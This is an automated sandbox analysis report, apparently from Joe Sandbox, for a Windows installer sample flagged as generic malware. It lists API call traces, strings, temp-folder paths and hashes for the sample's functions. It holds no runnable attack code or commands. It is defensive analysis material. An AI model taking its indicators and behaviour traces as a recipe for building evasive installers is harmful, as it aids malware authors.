                                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                        • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"$@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe$soft
                                                                        • API String ID: 2803837635-543604922
                                                                        • Opcode ID: a3529526dccc432a2db2b40383ee9d4975bb57828a7b0874a879935de9d3a064
                                                                        • Instruction ID: 70ffca3bdba6f18ae0426a301ce6e6f0801d42355b595fcaf053b8d4d934ef0e
                                                                        • Opcode Fuzzy Hash: a3529526dccc432a2db2b40383ee9d4975bb57828a7b0874a879935de9d3a064
                                                                        • Instruction Fuzzy Hash: B351D371A01204ABDB20AF64DD85B9B7EBCEB1431AF60813BF500B62D1C7BC9E458B5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        (Interactive graph not reproduced. Entry block: 4062ea. API calls shown in the graph: lstrlenA, GetSystemDirectoryA, GetWindowsDirectoryA, lstrcatA, SHGetSpecialFolderLocation, SHGetPathFromIDListA, CoTaskMemFree.)
                                                                        APIs
                                                                        • GetSystemDirectoryA.KERNEL32(ExecToStack,00000400), ref: 00406418
                                                                        • GetWindowsDirectoryA.KERNEL32(ExecToStack,00000400,?,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000,004053B0,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000), ref: 0040642B
                                                                        • SHGetSpecialFolderLocation.SHELL32(004053B0,774D23A0,?,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000,004053B0,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000), ref: 00406467
                                                                        • SHGetPathFromIDListA.SHELL32(774D23A0,ExecToStack), ref: 00406475
                                                                        • CoTaskMemFree.OLE32(774D23A0), ref: 00406481
                                                                        • lstrcatA.KERNEL32(ExecToStack,\Microsoft\Internet Explorer\Quick Launch), ref: 004064A5
                                                                        • lstrlenA.KERNEL32(ExecToStack,?,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000,004053B0,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000,00000000,00422E48,774D23A0), ref: 004064F7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                        • String ID: ExecToStack$Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll$Software\Microsoft\Windows\CurrentVersion$Y,J$\Microsoft\Internet Explorer\Quick Launch
                                                                        • API String ID: 717251189-2294800890
                                                                        • Opcode ID: 2c5d0b21685c3374f95166384517d31c94890b14ebe00e4cd94493511a12ea34
                                                                        • Instruction ID: b52c447f78294e1834a117c6ffbc2f7508752916544efe1487e33f4ad7b91c7d
                                                                        • Opcode Fuzzy Hash: 2c5d0b21685c3374f95166384517d31c94890b14ebe00e4cd94493511a12ea34
                                                                        • Instruction Fuzzy Hash: 53612270900110AFDF20AF24DD90B7E3BA8AB15318F52403FE903BA2D1C67C99A6DB5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • lstrcatA.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende,00000000,00000000,00000031), ref: 00401798
                                                                        • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende,00000000,00000000,00000031), ref: 004017C2
                                                                          • Part of subcall function 00406257: lstrcpynA.KERNEL32(0000000B,0000000B,00000400,00403556,Drivelingly Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406264
                                                                          • Part of subcall function 00405378: lstrlenA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000,00422E48,774D23A0,?,?,?,?,?,?,?,?,?,0040329E,00000000,?), ref: 004053B1
                                                                          • Part of subcall function 00405378: lstrlenA.KERNEL32(0040329E,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000,00422E48,774D23A0,?,?,?,?,?,?,?,?,?,0040329E,00000000), ref: 004053C1
                                                                          • Part of subcall function 00405378: lstrcatA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,0040329E,0040329E,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000,00422E48,774D23A0), ref: 004053D4
                                                                          • Part of subcall function 00405378: SetWindowTextA.USER32(Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll), ref: 004053E6
                                                                          • Part of subcall function 00405378: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040540C
                                                                          • Part of subcall function 00405378: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405426
                                                                          • Part of subcall function 00405378: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405434
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende$C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll$ExecToStack
                                                                        • API String ID: 1941528284-1095074102
                                                                        • Opcode ID: 1a6a60fe252985ba0f1bc75f027b945158fc7094871aab38a13c9e1e0ba7f2b8
                                                                        • Instruction ID: 09a7a28129c88a40a5f98fd7d2104631a28ae03f955191848f4916981dc93f0e
                                                                        • Opcode Fuzzy Hash: 1a6a60fe252985ba0f1bc75f027b945158fc7094871aab38a13c9e1e0ba7f2b8
                                                                        • Instruction Fuzzy Hash: 2E41B572900615BBCB207BB5CD45DAF3679EF05369F60823FF422B20E1D67C8A518A6D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        (Interactive graph not reproduced. Entry block: 405378. API calls shown in the graph: lstrlenA, lstrcatA, SetWindowTextA, SendMessageA (3 calls).)
                                                                        APIs
                                                                        • lstrlenA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000,00422E48,774D23A0,?,?,?,?,?,?,?,?,?,0040329E,00000000,?), ref: 004053B1
                                                                        • lstrlenA.KERNEL32(0040329E,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000,00422E48,774D23A0,?,?,?,?,?,?,?,?,?,0040329E,00000000), ref: 004053C1
                                                                        • lstrcatA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,0040329E,0040329E,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000,00422E48,774D23A0), ref: 004053D4
                                                                        • SetWindowTextA.USER32(Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll), ref: 004053E6
                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040540C
                                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405426
                                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405434
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                        • String ID: Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll
                                                                        • API String ID: 2531174081-3501885370
                                                                        • Opcode ID: a928f93debe5d30fd472564f6d7082d98afcf6bac59f3e1af05666e552d28e84
                                                                        • Instruction ID: bfa893c7d30147700316bd172ea6c956eb0bdb6a7275625f57f4f23b87bde493
                                                                        • Opcode Fuzzy Hash: a928f93debe5d30fd472564f6d7082d98afcf6bac59f3e1af05666e552d28e84
                                                                        • Instruction Fuzzy Hash: D7218C71A00518BBDB11AFA5DD84ADFBFB9EF04354F14807AF904B6290C7798E908F98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        (Interactive graph not reproduced. Entry block: 403143. API calls shown in the graph: GetTickCount (2 calls), MulDiv, wsprintfA.)
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CountTick$wsprintf
                                                                        • String ID: ... %d%%$0A$H.B
                                                                        • API String ID: 551687249-3873104639
                                                                        • Opcode ID: ede1e8e15d747a91ca4de53f89313a3819b99860a5cad6c8dedb11164fc401f9
                                                                        • Instruction ID: cc32688fb846b20799601ecf4724bdf5f6a604bb501928ae6cb5e0d1b862edc2
                                                                        • Opcode Fuzzy Hash: ede1e8e15d747a91ca4de53f89313a3819b99860a5cad6c8dedb11164fc401f9
                                                                        • Instruction Fuzzy Hash: 10517C71800219ABDB10DFA5DA8469F7BB8EF44766F14817BEC41B72D0C7389A50CBA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

Control-flow Graph

[Graph image not recoverable: basic blocks 4065f5-406660; API calls GetSystemDirectoryA, wsprintfA, LoadLibraryExA]
                                                                        APIs
                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040660C
                                                                        • wsprintfA.USER32 ref: 00406645
                                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406659
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                        • String ID: %s%s.dll$UXTHEME$\
                                                                        • API String ID: 2200240437-4240819195
                                                                        • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                        • Instruction ID: 9f789840e0b15416ae64874b5c60068ae2f650887ed5db1015d4ebb1f4ad26b2
                                                                        • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                        • Instruction Fuzzy Hash: 12F0213051060A67DB14A764DD0DFFB3B5CEB08304F14047EA586F10C1DAB9D5358B5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

Control-flow Graph

[Graph image not recoverable: basic blocks 40583e-4058b8; API calls CreateDirectoryA, GetLastError, SetFileSecurityA, GetLastError]
                                                                        APIs
                                                                        • CreateDirectoryA.KERNELBASE(?,0000000B,C:\Users\user\AppData\Local\Temp\), ref: 00405881
                                                                        • GetLastError.KERNEL32 ref: 00405895
                                                                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004058AA
                                                                        • GetLastError.KERNEL32 ref: 004058B4
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405864
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 3449924974-2145255484
                                                                        • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                        • Instruction ID: 2f5b217c954ff7fbb4119b01485a045b77912d3f79ec2e58d5a645a6a403fb95
                                                                        • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                        • Instruction Fuzzy Hash: A7010872C00219EAEF00DBA1C944BEFBBB8EF04355F00803AD945B6290E7789658CB99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

Control-flow Graph

[Graph image not recoverable: basic blocks 401c2e-401cf6 and 402ac5-402ad4; calls to 402c17 and 402c39; API calls SendMessageTimeoutA, SendMessageA, FindWindowExA]
                                                                        APIs
                                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: MessageSend$Timeout
                                                                        • String ID: !
                                                                        • API String ID: 1777923405-2657877971
                                                                        • Opcode ID: 60960b56f400513723277229af694750ddbbe590db3b19512bd1bbbb0dd5075d
                                                                        • Instruction ID: 6395210313b5e96ec4903c6722a9a41e79e60401c6fef9bd0231d245bd3396c8
                                                                        • Opcode Fuzzy Hash: 60960b56f400513723277229af694750ddbbe590db3b19512bd1bbbb0dd5075d
                                                                        • Instruction Fuzzy Hash: 56218571948208BEEB059FF5D986AAD7FB4EF44304F10447EF101B61D1D7B989819B18
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

Control-flow Graph

[Graph image not recoverable: basic blocks 405e19-405e60; API calls GetTickCount, GetTempFileNameA]
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00405E2D
                                                                        • GetTempFileNameA.KERNELBASE(0000000B,?,00000000,?,?,004033B1,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007), ref: 00405E47
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: CountFileNameTempTick
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                        • API String ID: 1716503409-386316673
                                                                        • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                        • Instruction ID: db84433a099d66a6ad53f3418d19e52f8fbd3804b66164b4918815a523437c08
                                                                        • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                        • Instruction Fuzzy Hash: 9CF0A736348208BBEB109F56ED04B9B7B9CDF91B50F10C03BFA84DB180D6B5DA548798
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020D0
                                                                          • Part of subcall function 00405378: lstrlenA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000,00422E48,774D23A0,?,?,?,?,?,?,?,?,?,0040329E,00000000,?), ref: 004053B1
                                                                          • Part of subcall function 00405378: lstrlenA.KERNEL32(0040329E,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000,00422E48,774D23A0,?,?,?,?,?,?,?,?,?,0040329E,00000000), ref: 004053C1
                                                                          • Part of subcall function 00405378: lstrcatA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,0040329E,0040329E,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,00000000,00422E48,774D23A0), ref: 004053D4
                                                                          • Part of subcall function 00405378: SetWindowTextA.USER32(Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll), ref: 004053E6
                                                                          • Part of subcall function 00405378: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040540C
                                                                          • Part of subcall function 00405378: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405426
                                                                          • Part of subcall function 00405378: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405434
                                                                        • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020E0
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004020F0
                                                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040215A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                        • String ID:
                                                                        • API String ID: 2987980305-0
                                                                        • Opcode ID: 5a96ab6c176026598fe3d54266224e5e5ed6545b4eadb25d5a8982baf4d6426a
                                                                        • Instruction ID: 3c6328a696446079fc2d308fbd04895e9a1cd4fdde8666fe7d5c2d170abc5611
                                                                        • Opcode Fuzzy Hash: 5a96ab6c176026598fe3d54266224e5e5ed6545b4eadb25d5a8982baf4d6426a
                                                                        • Instruction Fuzzy Hash: 7721F631904215E7CF207FA58F4DAAF3670AF54358F60423BF601B61E0DAFD49819A6E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                          • Part of subcall function 00405C82: CharNextA.USER32(?,?,0042BC98,0000000B,00405CEE,0042BC98,0042BC98,774D3410,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"), ref: 00405C90
                                                                          • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405C95
                                                                          • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405CA9
                                                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                          • Part of subcall function 0040583E: CreateDirectoryA.KERNELBASE(?,0000000B,C:\Users\user\AppData\Local\Temp\), ref: 00405881
                                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende,00000000,00000000,000000F0), ref: 0040163C
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende, xrefs: 00401631
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende
                                                                        • API String ID: 1892508949-1242700388
                                                                        • Opcode ID: b6a48ce52f76c1b375cba19854813e09be2f57adb9555eb69d8c4fa29f7fc4bc
                                                                        • Instruction ID: 7a2b8dfd757742e83ffe6dd7df5b12a9f5db33ee71018b299411addc72821366
                                                                        • Opcode Fuzzy Hash: b6a48ce52f76c1b375cba19854813e09be2f57adb9555eb69d8c4fa29f7fc4bc
                                                                        • Instruction Fuzzy Hash: 54110431508141EBDF307BA54D409BF27B49A96324B68453FF9D1B22E2DA3D4942AA3E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040254E
                                                                        • RegCloseKey.ADVAPI32(?,?,?,0040AC38,00000000,00000011,00000002), ref: 004025ED
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: CloseQueryValue
                                                                        • String ID:
                                                                        • API String ID: 3356406503-0
                                                                        • Opcode ID: 614ef133c6cbac83c15d29c2db6c6372e35b3af024f3350696efae1b8ce031cc
                                                                        • Instruction ID: 02260f91894b81efdf071d6bf66139ec23fd99d5adfc3060dafb801450c89547
                                                                        • Opcode Fuzzy Hash: 614ef133c6cbac83c15d29c2db6c6372e35b3af024f3350696efae1b8ce031cc
                                                                        • Instruction Fuzzy Hash: 3911BF71905205FFDB25CF64DA989AE7AB4AF01355F20483FE042B72C0D6B88A85DA6D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 6d6c05e2d17e61aa35ed6ac458fea53b968503eb473f312dedad9b12065ca57f
                                                                        • Instruction ID: 2b84f8aef59f8f821fe865236d11139dc57ce13a72bb3d14165ba5b6471e206c
                                                                        • Opcode Fuzzy Hash: 6d6c05e2d17e61aa35ed6ac458fea53b968503eb473f312dedad9b12065ca57f
                                                                        • Instruction Fuzzy Hash: B101D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 0040244A
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00402453
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
